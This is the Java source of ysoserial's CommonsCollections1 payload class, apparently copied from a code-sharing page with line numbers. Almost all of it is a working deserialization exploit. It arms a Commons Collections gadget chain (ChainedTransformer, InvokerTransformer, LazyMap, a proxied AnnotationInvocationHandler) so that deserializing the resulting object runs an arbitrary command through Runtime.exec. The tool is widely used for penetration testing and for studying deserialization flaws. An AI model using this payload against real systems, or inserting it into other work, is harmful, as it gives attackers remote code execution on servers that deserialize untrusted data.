Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package ysoserial.payloads;
2

3
import java.lang.reflect.InvocationHandler;
4
import java.util.HashMap;
5
import java.util.Map;
6

7
import org.apache.commons.collections.Transformer;
8
import org.apache.commons.collections.functors.ChainedTransformer;
9
import org.apache.commons.collections.functors.ConstantTransformer;
10
import org.apache.commons.collections.functors.InvokerTransformer;
11
import org.apache.commons.collections.map.LazyMap;
12

13
import ysoserial.payloads.annotation.Dependencies;
14
import ysoserial.payloads.util.Gadgets;
15
import ysoserial.payloads.util.PayloadRunner;
16
import ysoserial.payloads.util.Reflections;
17

18
/*
19
	Gadget chain:	
20
		ObjectInputStream.readObject()
21
			AnnotationInvocationHandler.readObject()
22
				Map(Proxy).entrySet()
23
					AnnotationInvocationHandler.invoke()
24
						LazyMap.get()
25
							ChainedTransformer.transform()
26
								ConstantTransformer.transform()
27
								InvokerTransformer.transform()
28
									Method.invoke()				
29
										Class.getMethod()
30
								InvokerTransformer.transform()
31
									Method.invoke()
32
										Runtime.getRuntime()
33
								InvokerTransformer.transform()
34
									Method.invoke()
35
										Runtime.exec()										
36
	
37
	Requires:
38
		commons-collections
39
 */
40
@SuppressWarnings({"rawtypes", "unchecked"})
41
@Dependencies({"commons-collections:commons-collections:3.1"})
42
public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
43
	
44
	public InvocationHandler getObject(final String command) throws Exception {
45
		final String[] execArgs = new String[] { command };
46
		// inert chain for setup
47
		final Transformer transformerChain = new ChainedTransformer(
48
			new Transformer[]{ new ConstantTransformer(1) });
49
		// real chain for after setup
50
		final Transformer[] transformers = new Transformer[] {
51
				new ConstantTransformer(Runtime.class),
52
				new InvokerTransformer("getMethod", new Class[] {
53
					String.class, Class[].class }, new Object[] {
54
					"getRuntime", new Class[0] }),
55
				new InvokerTransformer("invoke", new Class[] {
56
					Object.class, Object[].class }, new Object[] {
57
					null, new Object[0] }),
58
				new InvokerTransformer("exec",
59
					new Class[] { String.class }, execArgs),
60
				new ConstantTransformer(1) };
61

62
		final Map innerMap = new HashMap();
63

64
		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
65
		
66
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
67
		
68
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
69
		
70
		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
71
				
72
		return handler;
73
	}
74
	
75
	public static void main(final String[] args) throws Exception {
76
		PayloadRunner.run(CommonsCollections1.class, args);
77
	}
78
}
79

80